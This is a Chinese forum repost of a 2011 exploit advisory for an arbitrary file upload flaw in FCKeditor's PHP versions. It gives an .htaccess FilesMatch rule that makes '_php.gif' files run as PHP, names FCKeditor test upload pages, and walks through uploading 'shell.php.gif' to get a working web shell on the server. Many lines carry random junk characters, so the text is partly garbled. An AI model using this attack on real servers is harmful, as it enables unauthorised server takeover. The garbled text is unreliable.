FCKeditor所有php版本Upload上传漏洞
1 N* S) V$ u7 {. B) B1 Y" g作者:佚名 来源:本站整理 发布时间:2011-10-25 7:39:07
' W8 \0 g# i& M8 R3 @* W, Q9 ? e减小字体 增大字体
' k% p4 F/ s* a" c: M& |- ~[+] Title:FCKeditor all versian Arbitrary File Upload Vulnerability; c( W' G- a0 C5 z# O
[+] Date: 2011
9 a/ I/ w$ u4 i: {[+] Author : sinesafe.cn
& Q7 F% n2 N- q& u" E7 [5 f9 _[+] Website : WwW.sinesafe.cn0 c" U$ h% f' H" Z" t+ C
———————————————————
1 M! a9 c3 @8 h3 U9 A% [0 R: B, R5 i1.create a htaccess file:
5 C$ g9 L( M; V- E9 [code:
. F; K, |3 y$ p<FilesMatch “_php.gif”>
: T- [: Z0 a9 d6 O6 s$ @SetHandler application/x-httpd-php
) C% k; h4 f) O, t% c6 A3 j</FilesMatch>4 @# k1 r2 q% L( v1 b( G! R
8 ?9 {% g+ m* c* u1 g
2.Now upload this htaccess with FCKeditor.) O! m2 [ J& D
* Z d& U/ p1 |$ u7 ]$ O1 p* O: o
http://www.sinesafe.cn/FCKeditor ... er/upload/test.html
# H. K0 n; J% k% O$ g6 u! i/ Q' B% z5 w" y5 G
http://www.sinesafe.cn/FCKeditor ... onnectors/test.html# l) R( y \1 q) b* E# d
0 A% g' y) H' C7 m, ~4 ^
———————————————————————————————-
6 h' `0 x; R+ J3.Now upload shell.php.gif with FCKeditor.
. k3 Y+ R# r6 s9 t( Y* \( }* A4.After upload shell.php.gif, the name “shell.php.gif” change to “shell_php.gif” automatically.
( G% W6 e: j# Z; P& Y5.http://www.sinesafe.cn/anything/shell_php.gif7 E7 \. m: B y
6.Now shell is available from server. |
3 W5 a( n# o: H9 E9 e) h8 b
% f2 y) F- d" } {" v9 W7 b8 i4 W+ m! S# X" _. `# A
|
发表于 2013-10-27 17:25:21
收藏
支持
反对